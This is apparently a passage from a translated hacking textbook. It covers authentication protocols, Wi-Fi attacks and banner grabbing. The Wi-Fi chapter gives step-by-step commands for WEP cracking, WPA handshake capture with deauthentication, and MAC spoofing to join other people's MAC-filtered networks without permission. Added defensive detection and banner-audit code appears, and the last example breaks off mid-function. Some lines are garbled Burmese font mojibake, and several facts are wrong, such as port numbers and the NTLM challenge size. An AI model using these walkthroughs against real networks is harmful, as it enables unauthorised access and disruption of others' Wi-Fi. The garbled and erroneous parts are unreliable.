Category A = Something you know (e.g. Passwords, PIN, ...)
Category B = Something you have (e.g. smart card, ...)
Category C = Something you are (e.g. fingerprint, eye, voice, ...)
In the Token Generator mechanism we find three kinds: regular OTP, hashed OTP & time-based OTP. OTP is very secure, and it is a security mechanism that is in no way easy for hackers to guess in advance. That is because no formula of any kind is used to create the randomly generated passwords. In our country too, we see the OTP system being used in some Mobile Banking. It is the same when you log in from an application to Facebook & Google accounts that have login approval turned on. Time-based OTP can be studied in the Code Generator of the Facebook application that we use every day.

Authentication Protocols
Many authentication protocols, differing in security & usage, have been used over many years. For example, to connect to a corporate network from another location, the Point-to-Point Protocol, called PPP, was used. In PPP, PAP and other methods are used to authenticate the user. PAP stands for Password Authentication Protocol. Because its security is weak, it should not be used.
CHAP can be used instead of PAP. With the Challenge-Handshake Authentication Protocol (CHAP), a secret is kept and shared on both sides, client and server. That secret is not transmitted over the internet. MS-CHAP is CHAP as enhanced by Microsoft. It is a method in which the client and the server no longer need to know the secret keys.

CHAP Vs MS-CHAP
As discussed earlier, in CHAP both sides, client and server, need to know the secret key. After a link is established between the client & server, as the first step the server creates and sends a challenge key. The client uses a one-way hash function and shares the keys. It then sends the result back to the server. The server also uses the same hash algorithm and computes the challenge hash value with the shared key. The two responses are compared, and if they match, authentication is granted. If they do not match, access is not given.
MS-CHAP was created by Microsoft so that Windows computers in separate locations could connect to each other. There are differences between MS-CHAP and ordinary CHAP. In MS-CHAP the authenticator no longer needs to store plain-text (or) passwords. MS-CHAP also supports authenticator-controlled authentication retry and a password changing mechanism.
The second version of MS-CHAP was released in January, 2000. Because it can perform mutual authentication, the client & server can each authenticate the other. The authentication server sends a verification request to the client. The client has to respond with the user name. The Secure Hash Algorithm (SHA) has to hash the challenge string that was received. The authentication server checks the client's response and has to send back a notification of success (or) failure.
NTLM
NTLMv1 was used in Windows NT 4.0 and earlier versions. Because it uses LM and NT as its hashing algorithm, its security is quite weak. NTLMv2 is more secure and is still in use today. Because it uses the RC4 cipher in addition to NTv2 and LMv3 hashing, it is hundreds of times more secure than NTLMv1. NTLM Authentication works as follows.
1. The user enters the domain name, user name and password at the client computer. When they are entered, the actual password is discarded and converted into a cryptographic hash.
2. The client sends the user name to the server as plain-text.
3. The server generates a 64byte random number, called the challenge, and sends it to the client.
4. The client encrypts the server's challenge with the password hashes and sends it back to the server. This is designated the response.
5. The server then has to send the user name, the challenge it sent to the client, and the response that came back from the client (all 3) to the domain controller.
6. The domain controller looks up the user's password hashes in the SAM (Security Account Manager) by matching the user name, and has to use those hashes to encrypt the challenge.
7. The domain controller then has to compare the encrypted challenge obtained in step 6 with the response obtained in step 4. If they match exactly, the authentication is successful.
Although Microsoft's MS-CHAP is said to be secure, it cannot provide as much security as smart cards and PEAP. Let me leave those topics out, because I am worried the text would get too long.
Is it getting boring, since everything discussed in this chapter is just text? These chapters had to be included because you absolutely need to know these points and cryptography. When we are just starting to study, it is not easy to reach a more advanced level without knowing these things. The quality a hacker/pen-tester especially needs is patience. Let's all be patient with these steps and try not to skip ahead in the book.
Triple A (AAA)
We have probably all heard of AAA. It stands for Authentication, Authorization & Accounting. For a secure network, AAA is an indispensable requirement. Before this we discussed authentication protocols a little. That is still only one A.
It is the A for Authentication. There is something that can do AAA all at once: RADIUS. The Remote Authentication Dial-in User Service system (RADIUS) can authenticate, authorize & audit a user's actions. It is implemented by many vendors such as Microsoft, and it uses UDP port 1812 for authentication messages and UDP port 1813 for accounting. Older versions use UDP ports 1645 and 1646.
There are also other systems that work in a similar way to RADIUS, namely the Terminal Access Controller Access-Control Systems. There are many of them, such as TACACS, TACACS+, and XTACACS, which was enhanced by Cisco.
Please don't get bored because you are only reading text. Only when the basics that you must know are included and discussed will you understand the relevant areas better. Theory is the main opening onto the path you have to break through, so the better you understand the theory, the better; with that said, let's meet again in the next chapter.
CHAPTER 14: Wireless Network & Wifi Hacking

Introduction

This part is one that a great many people are interested in. It is also not a difficult area, so it is easy to understand. As usual I will first discuss the things you should know, so please bear with me and keep reading for a moment.
In today's age, when we see the use of wireless networks becoming ever more widespread, it is no surprise that interest in Wireless Hacking has grown too. Whether or not they use the internet, there are many businesses that use a wireless network to make connections locally (internally). For example, businesses that use a computerized sales system (Stock Management Software) are seen using wireless (wifi) for their network connections. In some restaurants and tea shops, too, you can see staff carrying tablets while they serve.
That is not all. We also see free wifi shops, wifi lines used for a monthly fee and so on around us. This shows how widely wireless is now used. Just as wifi is widely used, there have also been techniques for making a wireless network secure. But they cannot provide complete security.
In quite a few countries, large organizations and most government bodies prohibit installing and using wireless technology. The reason is that it cannot be trusted from a security standpoint. It is because a wireless network cannot provide as much security as a wired network. Nevertheless, the use of wireless networks has not declined; it is even growing.
For example, even when we share the internet connection of our own phone with a computer, we more often do it by broadcasting wifi. Using USB tethering is still rare. This is the clearest evidence.
Before going on to wireless attacks: to carry out a wireless attack, first of all our computer must have at least one wifi card. Built-in wireless cards have other weaknesses besides signal reception strength, so if possible a high power external interface is needed.
Alpha cards have a good reputation among those that can be bought on the market. They have good reception, and their high power output also makes them more convenient to use. If you use Kali Linux as the Attacker Machine in something like VirtualBox or VMWare, an external card becomes indispensable, and Alpha cards will give you more satisfaction.
In our country Alpha is hard to buy. Other brands can easily be found in computer shops. (Prices range from about ten thousand to thirty thousand kyats, so you can choose and buy.)
Some APs (Access Points) can broadcast only up to about 300 feet (and even that only when there are no obstacles), so if we want to connect we need to be very close. Alpha cards include designs that let them pick up signals better, so they are seen to work comfortably even from quite far away.
Most wireless attacks rely on the "Deauthentication Packet". The fact that Alpha cards can send out a great many deauthentication packets in a short time is also an advantage. (It is as if I keep pointing at it while saying you cannot buy it. :))

Aircrack Suite
aircrack-ng is a good tool for wireless network auditing, and it can be used as a program that cracks 802.11 WEP and WPA-PSK keys. aircrack-ng also includes tools for attacking wireless connectivity.
airbase-ng is a multipurpose tool used to attack both the client and the AP. aircrack-ng is a program that cracks 802.11 WEP and WPA-PSK keys.
airdecap-ng decrypts WEP/WPA/WPA2 capture files. airdrop-ng is a rule-based wireless authentication tool, and aireplay-ng can inject & replay wireless frames. airmon-ng can switch a wireless interface into monitor mode and disable monitor mode again. airodump-ng can capture raw 802.11 frames. This is a brief introduction to the tools included in aircrack-ng, and you need to remember them.
To try cracking a WEP system, a good many tools from the aircrack-ng suite are needed. I will give an example first. There are some things you need to note. (What you have to note is that this is only an explanation of each step. The hands-on practice for each one will be shown again afterwards. This step is important.)

First, type airmon-ng start wlan0 in the Terminal. This switches our wireless interface into monitor mode.
Once it says monitor enabled on mon0, the next step is to scan for the APs available nearby with airodump-ng wlan0.
BSSID means the AP's MAC address and CH means the channel. ENC means the encryption used by the AP, and ESSID is the AP's name (the wifi name). Once you have found our target network, you can stop by pressing Control+C.

airodump-ng starts working as a listener for the target AP. To specify which channel the AP is on, -c can be used. With -w you have to specify the capture file (which contains the data that has to be cracked later). --bssid is the AP's name (the name of the wifi connection to connect to).
In the picture you can see the DATA count. These numbers are very important when cracking the password.
If you look at this picture, you will see the MAC addresses of the devices connected to the target AP. If you do not see even one, cracking the password becomes harder.
The primary function of aireplay-ng is to generate traffic so that aircrack-ng can carry out WEP cracking. There are option 1 & option 0 to use. Option 1 immediately sends a fake authentication to the AP.
After that, the -3 option is used to start the ARP request "replay attack". The classic ARP request replay attack is the most effective way to generate new initialization vectors (IVs). It is also the most reliable. The program listens for an ARP packet and retransmits it to the AP. By sending out ARP packets again and again, the WEP key is obtained by way of the new IVs in the responses that come back from the AP.
Once we have enough ARP packets, we can use aircrack-ng to crack the captured IVs. It takes a little time for the cracking to finish.

Hacking MAC Filtering Wifi


If, among the wifi networks around us, some have no password protection and yet you cannot connect and use them, then for certain MAC Filtering is in place. Most of the devices we use have a MAC Address. It can be thought of simply as the address of the wifi card, and MAC addresses differ from device to device.
So, to make their wifi network secure, some people use the method of checking MAC addresses (a method that needs no password, in which MAC addresses are entered in advance, the MAC address of every device that comes to connect is checked against them, and the device is allowed to connect only if it matches). But for people who use a Linux such as Kali Linux, this is not a secure method. In addition, just by briefly borrowing the phone (or) computer of someone who is currently using that network, the MAC Address can be learned and copied, and it is easy to change to it, so this is something even people who are not Linux users can do.
Now let's try getting past a wifi system with MAC Filtering from Kali Linux. Let me explain from the beginning.

If you look at the picture above, you will see that a network called Test Wifi has no password. When you select it and try to connect, it shows the tick mark that indicates connected.
Although it shows Connected, you will find that you cannot use the internet and have no connection. In that case you can tell that this wifi connection uses MAC Address Filtering as its security. (Note: this does not refer to the kind of wifi network that is created when copying files with Zapya on Android phones. If wifi is broadcast from a phone without the internet turned on, you will also connect and have no internet. With MAC filtering, the people who have been permitted can use the network, and it is only when you yourself connect that you cannot use it.)
It is as I described. If you come across a wifi network with MAC Filtering, you will be able to connect by following the methods described now. (MAC filtering is not available when a hotspot is shared from Android.)

First, to find out your wifi interface, you can call airmon-ng. If you look at the picture, you will see wlan0 shown below Interface. (That is wlan zero.) So my interface is wlan0. If there is a 1 in place of the 0, it is wlan1.
When I looked with airodump-ng wlan0 as in the picture, I saw the following.
I have already discussed earlier what each item means. Here too I have picked out only the main part to show. If you look at the picture, you will find that the BSSID is 02:2B:32:9E:C2:A4, CH is 1, and ENC shows OPN (Open). Because that network filters MAC addresses, we need to know the MAC addresses of the devices that are currently connected to it. Copy the BSSID. (02:2B:32:9E:C2:A4). Then, since we have found what we want, you can press control+c to return to the command line. Alternatively, you can open another Terminal.

What I used is clear. I used airodump-ng again. After -c you have to enter the CH (Channel) that was found in the step above. I saw only 1 under CH, so I used 1. After --bssid I filled in the BSSID copied earlier. wlan0 is the interface. I think you understand.
If you look at the picture, you will see the devices that are using CH 1, BSSID 02:2B:32:9E:C2:A4. In the picture above I showed only one device. If we look there again, we see it as in the picture above. The part that is needed has been cut out to show it. If you look there, you will find the MAC address of the device in use on our Target Network (BSSID) under STATION. According to the picture above it is 74:23:44:20:39:2F. Copy it. (Since we now have the used device's MAC address that we want, you can exit with Control+c. From now on I will not mention exiting.)

Because there is a little to adjust on the current wifi card, type service network-manager start and ifconfig wlan0 down, one line at a time, as in the picture. After that we can change our MAC Address.
To change the MAC address you can use MAC Changer. You have to write macchanger. -m is there to indicate that a MAC address will be given, and after it enter the MAC address copied earlier. Then you have to enter the interface, wlan0. When you then press enter, you will see current MAC address, Permanent MAC and New MAC, as in the picture above. New MAC: has changed to the one copied earlier. After that you have to bring wlan0, which was taken down earlier, back up. Type it line by line as in the picture above. Then wait a moment, and once the wifi icon has come back you can connect.
As in the picture above, it will show that wifi is connected, and internet access has now been obtained.

WEP Cracking
Now let's try cracking the WEP wifi security system.
It is as explained above. airmon-ng is used to find out the wifi interface. The interface turns out to be wlan0.
At this step, airmon-ng start wlan0 switches the wlan0 interface into Monitor Mode (mon). In the interface field we now see wlan0mon. (If we are using an external wifi adapter (Alpha), the processes listed with PID & Name can be killed.)
Now there are no processes left that could cause trouble. Let's listen for the wireless networks available around us.

'gu cPcP&SdjyDrdkY &Sif;rjyawmhbl;aemf/ 'gqdk&ifawmh uRefawmfwdkY


ywf0ef;usifrSm &EdkifwJh wifi connection awGudk ckvdk azmfjyay;aeygjyD/

ck uRefawmfwdkY avhvmrSmu WEP jzpfygw,f/ WPA2 r[kwfao;ygbl;/


txufygyHkrSmMunfh&if WEP wpfckudk awGYjrif&rSmyg/

jrifomatmif wpfaMumif;wnf; a&G;jywmyg/ 'Dtay:u yHkrSmMunfh&if


acgif;pOfawGudkyg jrif&rSmyg/

Another one like this shows up on CH 14 as well. The network I will use
as the example is the one highlighted in this picture.
Now that the network we were looking for has been found, exit with
Control+C. Then copy the MAC address shown in the BSSID column.

Checking the channel of the network I copied (the one to be tested), the
column headed CH shows 10. So CH is 10.

Open another new terminal and leave airodump-ng wlan0 running. Then open
one more new terminal.

The form to write is airodump-ng -c (CH) -w capture1 --bssid (MAC Add)
mon0. CH is 10, and the MAC address is the one copied earlier. -w is for
the wireless data that will be captured. Name it capture or capture1,
whichever suits you, but remember the name you give.
I waited a while until Data went past about 1200. You need to wait until
there is enough for the attempt to succeed reliably. Now that the
required level has been reached, open another terminal.

In the newly opened terminal, type aireplay-ng -1 0 -a (MAC) mon0 and
press Enter.

As shown above, you will see the authentication request being sent and
ACKs being received, after which it reports Association successful.

Once authentication has succeeded as shown above, continue as follows at
the command line that appears.

It is nothing special: in the association command, the Zero is simply
changed to 1.

Here you may find that it stops with an error such as mon0 is on channel
8, but the AP uses channel 10, as in the picture above. This is because
the Access Point tends to change channel. Try once more; you will see it
change to yet another one.

In that situation, one of the terminals opened earlier has to be closed.
You probably remember the terminal in the picture above; close that one.
It is the terminal that was opened at about the very start.

Now the command in which 0 was changed to 1 is working. In the terminal
where we waited for Data to pass 2000, you will also see Data climbing
further.

Open yet another terminal and type aireplay-ng -3 -b (BSSID/MAC) mon0.
(BSSID = MAC address of the wifi.) -b says that a BSSID is being given.

In the terminals you will see the numbers for both Data and Beacons
rising quickly. The most recently opened terminal shows it working to
obtain ARP requests. In the real world it will go faster, because there
are devices connected to the AP.

On my side, no ARP request has arrived yet. To get ARP requests quickly,
a client connected to the network has to be made to disconnect and then
reconnect. If that can be done, things become easier. This is similar to
starting a DoS attack against a client.

The command above can be used to deauthenticate a client. Put the Access
Point's MAC (BSSID) in place of APMAC. -a means the AP, and -c stands
for the client. The clientMAC after -c is the MAC address of the client
that you want to drop briefly and have reconnect. I won't repeat how to
see who is currently connected.
Now the ARP requests, of which there were none a moment ago, are being
received, as you can see in the picture below.
In the picture above you can see a large number of ARP request packets.
Once this point is reached, open another terminal. We will use
aircrack-ng.

Because the capture has to be specified, type aircrack-ng capture1-0 and
press Tab (do not press Enter yet); the capture file names are listed,
as in the picture above. We will use capture1-01.cap.

I entered capture1-01.cap and pressed Enter. The result was Failed. Next
try with 5000 IVs. There is no need to be discouraged: we still have
another capture file. Let's try capture1-02.cap.

capture1-02.cap has now been supplied.

This time we have succeeded. The output reads KEY FOUND!
[ 31:32:33:34:35 ] (ASCII: 12345) Decrypted correctly: 100%. WEP
encryption comes in 64bit and 128bit. 64bit is a small key, and whatever
has been used can be recovered: 12345, abcdef and so on. 128bit needs a
little more time. Let's stop here. Next, let's go on to discuss
WPA2-PSK.

WPA and WPA2


Cracking WPA and cracking WPA2 do not differ much from each other, but
they are not the same as WEP cracking; they differ from it considerably.
Let's start with airmon-ng again.

The interface is already known, so wlan0 is entered directly. When
airmon-ng start wlan0 is run, wlan0 (wifi) disappears, because it has
gone into mon (monitor mode).
I cleared the two processes that were causing trouble, using the form
kill PID. You can see this in the picture above.

This is a command you already know; it is for finding wifi networks.
Note that, because the interface is in monitor mode, it has become
wlan0mon.

The search has started. To keep things clear, only one network is shown
here, the one named Test.

Looking at the picture again, you will see BSSID, CH, ... and so on.
Under ENC it shows WPA.

The target has been found, so press Control+C to stop. Copy the BSSID of
the wifi network named Test. CH is 1. Cracking WPA keys requires a
password list file.

What was used is airodump-ng -c 1 (because CH is 1) --bssid
02:2B:32:9E:C2:A4 (put in the BSSID of your own target) -w Desktop/.
The last part is as you already know: it directs the output to the
Desktop. I won't explain wlan0mon again.

Opening Files, you will see files like these appear on the Desktop. They
are files created by the aircrack suite through airodump.

In the terminal you can also see it trying to find a handshake for the
AP. With WPA & WPA2 the Data count does not matter; only the handshake
matters, so the handshake is the priority. Open another terminal.
Copy the MAC address (STATION) of someone who is currently connected to
the network.

The command used was aireplay-ng -0 2 -a BSSID -c ClientMAC wlan0mon.

With the two terminals shown side by side, WPA handshake will appear at
the top right corner of the upper terminal. Now the -01.cap file among
the files seen on the Desktop earlier can be cracked. Open another
terminal for the cracking. (Before opening it, note that I keep my small
wordlist file in the Home directory, the location that appears as soon
as Files is opened. Its file name is passwords.txt.)

What was used is aircrack-ng -a 2 -b (bssid) -w (password file)
Desktop/(.cap file name). Press Enter and let's see what comes back.
KEY FOUND is displayed. The password is thisistesting. Simply typing
that in as the password lets us use that wifi network.
This method depends on the password list file. It works only if your
password list contains the right password. Brute force can also be used,
but it can take a very long time. Using a complete wordlist is better.
Because wordlists differ from country to country in their basis,
terminology and language, there can be difficulties in some places.
Moreover, a wordlist complete enough to leave no gaps can reach a file
size of around 4TB. So you can create (or obtain) wordlist files of
likely candidates and use those. Brute force is covered further later.
(If wifi does not come back because of monitor mode, just do the
following.)
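
Both the WEP and the WPA walkthroughs above rely on forcing a client to disconnect and reconnect, which a defender sees as a burst of deauthentication frames, often followed by a fresh handshake. The following detection sketch is an added example, not part of the book; the record format, MAC addresses and thresholds are all constructed assumptions.

```python
"""Flag deauthentication bursts in 802.11 management-frame records."""
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"


def build_sample():
    """Constructed records (time_s, frame_type, bssid, client); all MACs are made up."""
    ap = "02:00:00:aa:00:01"
    victim = "02:00:00:cc:00:10"
    roamer = "02:00:00:cc:00:20"
    frames = [
        (5.0, "deauth", ap, roamer),  # one ordinary disconnect
        (6.0, "eapol", ap, roamer),   # followed by a normal re-join
    ]
    # Burst aimed at a single client, followed by that client's new handshake.
    frames += [(100.0 + i * 0.02, "deauth", ap, victim) for i in range(40)]
    frames += [(103.1 + i * 0.02, "eapol", ap, victim) for i in range(4)]
    # Burst aimed at every client of the AP, with no handshake seen afterwards.
    frames += [(200.0 + i * 0.05, "deauth", ap, BROADCAST) for i in range(20)]
    return frames


def split_runs(times, max_gap):
    """Split sorted timestamps into runs whose neighbours are at most max_gap apart."""
    runs, run = [], [times[0]]
    for t in times[1:]:
        if t - run[-1] <= max_gap:
            run.append(t)
        else:
            runs.append(run)
            run = [t]
    runs.append(run)
    return runs


def detect_deauth_bursts(frames, max_gap=1.0, threshold=10, follow=10.0):
    """Return one alert per run of >= threshold deauth frames to the same target.

    handshake_followed is True when an EAPOL frame for the same client (or any
    client, for a broadcast burst) is seen on that BSSID within `follow`
    seconds after the burst ends.
    """
    deauth = defaultdict(list)
    eapol = defaultdict(list)
    for ts, ftype, bssid, client in frames:
        if ftype == "deauth":
            deauth[(bssid, client)].append(ts)
        elif ftype == "eapol":
            eapol[bssid].append((ts, client))

    alerts = []
    for (bssid, client), times in deauth.items():
        for run in split_runs(sorted(times), max_gap):
            if len(run) < threshold:
                continue  # a lone deauth is normal client behaviour
            end = run[-1]
            shook = any(
                end <= ts <= end + follow and client in (BROADCAST, who)
                for ts, who in eapol.get(bssid, [])
            )
            alerts.append({
                "bssid": bssid,
                "client": client,
                "start": run[0],
                "frames": len(run),
                "handshake_followed": shook,
            })
    return sorted(alerts, key=lambda a: a["start"])


if __name__ == "__main__":
    for alert in detect_deauth_bursts(build_sample()):
        print(alert)
```

Enabling 802.11w Protected Management Frames on the access point, where the clients support it, lets clients reject spoofed deauthentication frames.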
CHAPTER 15: Banner Grabbing

Introduction

The previous chapter covered hands-on work, so this chapter turns to
things worth noting. This chapter is also an important part, so the more
of it you know, the more you benefit.

Speaking as an administrator, we have to protect our servers, software
and networks from attackers. We also need to know the threats that are
possible in our network environment and the ways to deal with them.

As we know, hackers use a variety of techniques in trying to collect
information about our web, network, servers, services and so on.

Most of the techniques hackers commonly use are well known. So they
quietly search for and study new, little-known ways to attack, new ways
to inject malicious code, and new ways to gain unauthorized access that
would let them control our networks, systems and so on.
Vulnerabilities are what help attackers get into our systems. Among
vulnerabilities, those that have not been discovered to this day are
called zero-day vulnerabilities, and they may exist in every system.
Once a new vulnerability is found, an exploit that can attack it has to
be worked out. Once such an exploit has been produced, it is called a
zero-day exploit. The name zero-day comes from the fact that the attack
comes through a weakness the developers have not yet noticed, so that
when it arrives there has been no advance knowledge and no time to
prepare, that is, zero days of preparation time.

When a new vulnerability has been found and an exploit for it exists,
they can be called a zero-day vulnerability and a zero-day exploit, but
only while no attack has yet been carried out. If that vulnerability and
exploit are then used in an attack, those first attacks are called
zero-day attacks. Once the vulnerability is known, an exploit for it is
known to exist, and a solution (patch) for the damage has been issued,
whether by those attacked, by the original producer or by a government,
the attack can no longer be called a zero-day attack and the
vulnerability can no longer be called a zero-day vulnerability. This is
because others now know about the vulnerability and the exploit and can
take precautions in advance. That is only a brief summary. Let's
continue.

What is Banner Grabbing?


Banner Grabbing can be roughly defined as a technique for collecting
information related to the operating system and services running on a
system. It can be performed using Telnet or another suitable program.

To do this, a connection must first be made to a remote machine. Once a
connection exists, all kinds of requests known as bad requests can be
sent. Doing so can cause a vulnerable host to respond with banner
messages.

Banner messages contain information that can be used in attempts to take
control of the system. To put the word banner simply, it is a message in
which a service describes itself when another program tries to connect
to it. As an illustration, when we visit web pages we see advertisements
placed on them, and those are commonly called banners. A service banner
is like those banners, which carry messages such as details of the
advertised goods and the addresses to contact.

Default banners contain information about the service, such as software
version numbers. For the HTTP (Hyper Text Transfer Protocol) service,
banners include the server software type, the version number, the date
and time of last modification, and much other information. A program
such as Telnet can be used to find and retrieve this information.
Retrieving it in this way is called Banner Grabbing.
Besides telnet there are other programs for Banner Grabbing. Telnet is a
network protocol that can be started as a virtual terminal connection
from a remote host. Because most operating systems have everything
needed to run a Telnet session, using Telnet can be called the primary
way of Banner Grabbing. Banners can be grabbed (that is, retrieved) by
connecting to a host. Requests can then be sent to the ports associated
with services, for example port 80 for HTTP.

There is a question to ask here. Is Banner Grabbing done only by
hackers? No. In fact system administrators also use it to collect an
inventory of all the different services and systems operating on the
hosts they are responsible for. White hat hackers also use Banner
Grabbing in the planning phase of a penetration test.

Malicious hackers use Banner Grabbing mostly to find vulnerable hosts.
We have already discussed that the default banner contains the server
software type and version. So they can look up and use the
vulnerabilities and exploits that exist for that particular software.

You probably remember the 7 steps of Information Gathering discussed
earlier. We discussed that the first six are Active & Passive
Footprinting and that the last, number 7, is Enumeration. Banner
Grabbing is an enumeration technique used to collect information about
the computer systems on a network and the services running on their
ports. Its main purpose is to identify vulnerable ports and the exploits
to use against them.

Examples of ports commonly used for banner grabbing are port 80 for HTTP
(Hyper Text Transfer Protocol), port 21 for FTP (File Transfer Protocol)
and port 25 for SMTP (Simple Mail Transfer Protocol). As discussed
earlier, the tool most often used for banner grabbing is Telnet, which
is already included in a good many operating systems. Another commonly
used tool is Netcat.

Types of Banner Grabbing


When grabbing, two main methods are generally used. The most common is
to connect directly to the remote host. To grab the banner, specially
crafted TCP packets are sent. Because vendors interpret things
differently when implementing the TCP/IP stack in an operating system,
the responses can differ too. So after the specially crafted packets
have been sent, the responses received are compared against a response
database.

For example, Nmap performs operating system fingerprinting (or Banner
Grabbing) in 8 steps. Seven of those steps are designated T1, T2 through
T7, and the remaining one is called PU (Port Unreachable). Details of
these tests can be found at www.packetwatch.net. (They are left out here
for reasons of space.)

The most widely used form of Banner Grabbing is Active Banner Grabbing,
but it does not always have to be active. In Active Banner Grabbing
there is no need to scan the target remote host. Passive Banner Grabbing
is built on how operating systems respond to packets. It uses sniffing
to capture packets from the target host. The captured packets are then
studied for information from which the operating system and its version,
the programs in use and their versions, ports and so on can be
estimated.

Four things are generally used in estimating the OS in this way. The
first is Time-To-Live (TTL): operating systems set a time-to-live on
outbound packets. The second is the window size. The third is the DF
flag set by the OS; DF means the "Don't Fragment" bit. The last is the
service given by the OS. The decision is based on these four signatures.
This does not at all mean that only these four may be considered when
identifying an OS; information obtained during the information gathering
stage can also be taken into account. Details are available at
www.honeynet.org/papers/finger.
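
The passive approach described above can be turned into an asset-inventory check on traffic captured from your own network, without sending anything to the hosts. This is an added example, not from the book: it uses the TTL, window size and DF bit of observed packets, and the signature table and packet records are constructed for illustration only.

```python
"""Passive OS hint from the TTL, TCP window size and DF bit of observed packets."""

COMMON_INITIAL_TTLS = (32, 64, 128, 255)

# Illustrative signature table, constructed for this example. A maintained
# fingerprint database is far larger and is updated as stacks change.
SIGNATURES = [
    {"os": "Linux-like", "ttl": 64, "windows": {5840, 14600, 29200, 64240}, "df": True},
    {"os": "Windows-like", "ttl": 128, "windows": {8192, 64240, 65535}, "df": True},
    {"os": "Network device-like", "ttl": 255, "windows": {4128}, "df": False},
]

# Constructed observations, as a sniffer on a monitoring port might record them.
SAMPLE_PACKETS = [
    {"src": "192.0.2.10", "ttl": 52, "window": 64240, "df": True},
    {"src": "192.0.2.20", "ttl": 117, "window": 64240, "df": True},
    {"src": "192.0.2.30", "ttl": 254, "window": 4128, "df": False},
    {"src": "192.0.2.40", "ttl": 30, "window": 1024, "df": False},
]


def initial_ttl(observed):
    """Round an observed TTL up to the nearest common starting value.

    Every router on the path decrements the TTL by one, so the sender's
    starting value is the smallest common default that is not below it.
    """
    if not 1 <= observed <= 255:
        raise ValueError("TTL must be between 1 and 255")
    return next(t for t in COMMON_INITIAL_TTLS if t >= observed)


def classify(packet):
    """Return the best-matching OS family, hop distance and matched fields."""
    start = initial_ttl(packet["ttl"])
    best = None
    for sig in SIGNATURES:
        if sig["ttl"] != start:
            continue  # the starting TTL is the gate; other fields refine it
        evidence = ["ttl"]
        if packet["window"] in sig["windows"]:
            evidence.append("window")
        if packet["df"] == sig["df"]:
            evidence.append("df")
        if best is None or len(evidence) > len(best[1]):
            best = (sig["os"], evidence)
    os_name, evidence = best if best else ("unknown", [])
    return {
        "src": packet["src"],
        "os": os_name,
        "hops": start - packet["ttl"],
        "evidence": evidence,
    }


def inventory(packets):
    """Map each source address to its OS hint."""
    return {p["src"]: classify(p)["os"] for p in packets}


if __name__ == "__main__":
    for pkt in SAMPLE_PACKETS:
        print(classify(pkt))
```

The first two sample packets share the same window size, so only the inferred starting TTL separates them; a single field on its own is a weak signal.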
Banner Grabbing Tools
There are several tools for Banner Grabbing: ID Serve, Netcat, Nmap,
Netcraft and Telnet. Each is described briefly below.

ID Serve is used to identify the make, model and version of any
website's server software. Although users do not see it, servers usually
send this information as a preamble when replying to web queries. ID
Serve can also connect to non-HTTP internet servers (e.g. FTP, SMTP,
POP, NEWS, ...). Such non-HTTP internet servers produce lines containing
numeric status codes and can also produce a human-readable greeting for
connecting clients. ID Serve can receive any greeting message and report
it. It can also perform a reverse DNS lookup. ID Serve uses standard
Windows TCP to connect to remote servers and ports, so it can report
whether a connection succeeded. If a connection does not complete, ID
Serve shows a message such as the port is closed or stealth.

Netcraft (an anti-phishing community) is able to protect its community
against phishing attacks. The Netcraft website periodically surveys web
servers to determine their operating system and web server versions, so
hackers can obtain useful information through Netcraft. Netcraft can be
used as an anti-phishing & web server verification tool, to stay clear
of spoofed web servers and to guard against phishing.

Netcat is a networking utility that can read and write data across
network connections. It can use TCP/IP or UDP and was created as a
reliable "back-end" tool that other programs can easily use. It is also
a handy tool in its own right, because it provides access to functions
such as outbound & inbound connections, TCP or UDP, from port to port.
Netcat has a tunneling mode that handles UDP to TCP well, and network
parameters can be specified too. Netcat can also be used to banner-grab
a website.

Telnet is a user command that works over the TCP/IP protocol to access
remote computers. It is also built into Windows. Using Telnet, system
administrators and other users can access other computers remotely. On
the web, HTTP & FTP likewise allow certain files on a remote computer to
be requested without logging in to that computer. In addition, without
any privileges, an ordinary user can obtain data on that computer and
can also log in to specific applications.

We have already used Nmap earlier, so I won't go into detail.

Banner Grabbing using Telnet


Let's grab a banner using Telnet. Banner Grabbing is the quickest way to
knock on a website's door. Open a terminal in Kali Linux.

The first thing run is telnet (target) 80. The 80 refers to port 80
(HTTP). www.hak5.org is shown as the example target. Pressing Enter as
shown above gives the output below.

At this step you need to be quick. As soon as the Escape character line
appears, carry on typing as follows.

What to type is GET / HTTP/1.0. Type it quickly and press Enter twice.
You will then see output like the picture below.
Here is another way to view this kind of information.

What was used is curl -I (target):80.

You will see the result as in the picture above. It is easier to read
and gives good information. In both cases I showed only port 80, for
HTTP. Look into the other ports yourselves, for example:
SSH = port 22
Telnet = port 23
SMTP or mail = port 25
Domain = port 53
Pop3 = port 113
Imap = port 143
HTTPS = port 443
Imaps = port 993
Pop3s = port 995
MySQL = port 3306

Countermeasures
Attackers use the banner grabbing technique to try to find out our
device type, OS, applications & versions, and so on. Based on the
information collected, they can attack our systems with known exploits.
Known exploits can still be used against systems that have not applied
the patch files issued to fix the vulnerability.

So, as a precaution, the banners on our web servers can be made to show
misleading information, and the patches that fix vulnerabilities should
be applied regularly. Also, because hackers look for and attack
vulnerable ports, all ports on our websites (web servers) other than
those that are strictly necessary should be closed. File extensions can
also reveal information about the server technology, so hiding file
extensions is good practice as well. Replacing .asp with .htm, or
otherwise misdirecting whatever could identify the server, can also be
done. Apache users can use mod_negotiation directives, and IIS users can
manage file extensions with tools such as PageXchanger.
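
To check whether these countermeasures have taken effect on a server you administer, the response head that curl -I prints can be audited for the details this chapter says a banner leaks. This is an added example, not from the book; the two response heads are constructed samples, and the list of headers and extensions checked is an assumption that can be extended.

```python
"""Audit an HTTP response head for version and technology disclosure."""
import re

# Headers that commonly carry product names and versions.
DISCLOSING_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-aspnetmvc-version")
VERSION_RE = re.compile(r"\d+(?:\.\d+)+")
TECH_EXT_RE = re.compile(r"\.(?:php|asp|aspx|jsp|cgi|pl)\b", re.IGNORECASE)

# Constructed sample: a default-style banner before hardening.
BEFORE = (
    "HTTP/1.1 302 Found\r\n"
    "Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "X-Powered-By: PHP/7.4.3\r\n"
    "Location: /login.php\r\n"
    "\r\n"
)

# Constructed sample: the same response after hardening.
AFTER = (
    "HTTP/1.1 302 Found\r\n"
    "Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    "Server: Apache\r\n"
    "Location: /login\r\n"
    "\r\n"
)


def parse_head(raw):
    """Split a raw response head into its status line and (name, value) pairs."""
    lines = raw.replace("\r\n", "\n").split("\n")
    headers = []
    for line in lines[1:]:
        if not line.strip():
            break  # a blank line ends the header block
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
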